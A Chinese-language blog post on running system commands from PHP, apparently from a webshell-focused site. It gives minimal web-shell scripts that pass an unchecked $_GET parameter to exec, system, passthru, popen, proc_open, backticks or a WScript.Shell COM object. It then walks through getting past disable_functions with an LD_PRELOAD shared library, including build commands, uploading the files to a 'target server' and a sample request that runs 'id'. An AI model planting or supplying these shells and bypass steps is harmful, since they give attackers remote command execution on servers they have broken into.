PHP中执行系统命令
在PHP中,执行系统命令,有以下方式或方法:

exec()
shell_exec()
`whoami`
system()
passthru()
popen()
proc_open()
pcntl_exec() :需要开启pcntl扩展
COM组件:Wscript.Shell和Shell.Application
dl():通过加载自定义php扩展突破 disable_fucnitons指令的限制
利用PHP内核变量绕过disable_functions,传送门:利用PHP内核变量绕过disable_functions(附完整代码)

exec()

该函数默认返回值是执行结果的第一行,并不会有全部的执行结果。如果要打印执行结果,需遍历打印output数组。

string exec ( string command, array &output, int &return_var)
command参数是要执行的命令
output数组是保存输出结果
return_var整形用来保存命令执行后的状态码,0代表执行成功,1代表执行失败

<?php
	$command=$_GET['command'];
	$ret=exec($command,$output,$a);
	echo $ret;					#默认只返回第一行结果
	echo "<br>";
	echo "****************************************************";
	echo "<br>";
	echo "Status: ",$a;			#打印出执行状态码
	echo "<br>";
	echo "****************************************************";
	$length=count($output);		#数组的长度
	for($i=0;$i<$length;$i++){
		echo $output[$i];
		echo "<br>";
	}
?>

shell_exec()

 

<?php
	$command=$_GET['command'];
	$ret=shell_exec($command);
	echo $ret;
?>

 

system()

 

system()
system(string command , int & return_var)
command参数是要执行的命令,
return_var参数存放返回的值,可不写该参数

<?php
	$command=$_GET['command'];
	$ret=system($command);
	echo $ret;
?>

 

`$command`

<?php
	$command=$_GET['command'];
	$ret=`$command`;
	echo $ret;
?>

passthru()

<?php
	$command=$_GET['command'];
	passthru($command);
?>

popen()

popen ( string command, string mode )
打开一个指向进程的管道,该进程由派生给定的 command 命令执行而产生。 返回一个和 fopen() 所返回的相同的文件指针,只不过它是单向的(只能用于读或写)并且必须用 pclose() 来关闭。此指针可以用于 fgets(),fgetss() 和 fwrite()。

<?php
	$command=$_GET['command'];
	$fd = popen($command, 'r'); 
	while($s=fgets($fd)){
		print_r($s);
	}
?>

proc_open()

resource proc_open ( string cmd, array descriptorspec, array &pipes [, string cwd [, array env [, array other_options]]] )

<?php
	$command=$_GET['command'];
    $descriptorspec=array( 
        0=>array('pipe','r'), 
        1=>array('pipe','w'),
        2=>array('pipe','w') 
    );
    $handle=proc_open($command,$descriptorspec,$pipes,NULL);
    if(!is_resource($handle)){
    	die('proc_open failed');
    }
    while($s=fgets($pipes[1])){
    	print_r($s);
    }
    while($s=fgets($pipes[2])){
    	print_r($s);
    }
    fclose($pipes[0]);
    fclose($pipes[1]);
    fclose($pipes[2]);
    proc_close($handle);
?>

COM组件
php>5.4版本需手动添加该扩展

在php.ini文件中,加入如下这行

然后查看phpinfo,该扩展是否enable。

enable之后,就可以使用如下脚本了。

<?php
$command=$_GET['cmd'];
$wsh = new COM('WScript.shell');
$exec = $wsh->exec("cmd /c ".$command);
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput;
?>

如果目标是Linux系统的话,可以参考:

https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD

项目中现成的so文件可以如下编译

# x64
gcc -shared -fPIC bypass_disablefunc.c -o bypass_disablefunc_x64.so
# x86
gcc -shared -m32 -fPIC bypass_disablefunc.c -o bypass_disablefunc_x64.so

将php和so都上传到目标服务器后,访问如下即可执行命令

http://x.x.x.x/bypass_disablefunc.php?cmd=id&outpath=/var/www/html/xxx&sopath=/var/www/html/bypass_disablefunc_x64.so

备注:建议outpath和sopath同个目录,防止outpath没权限写,或者找到上传文件的目录,肯定有权限写的。 不推荐有GET,可以改成POST提交更安全。

转载请注明来自WebShell'S Blog,本文地址:https://www.webshell.cc/7392.html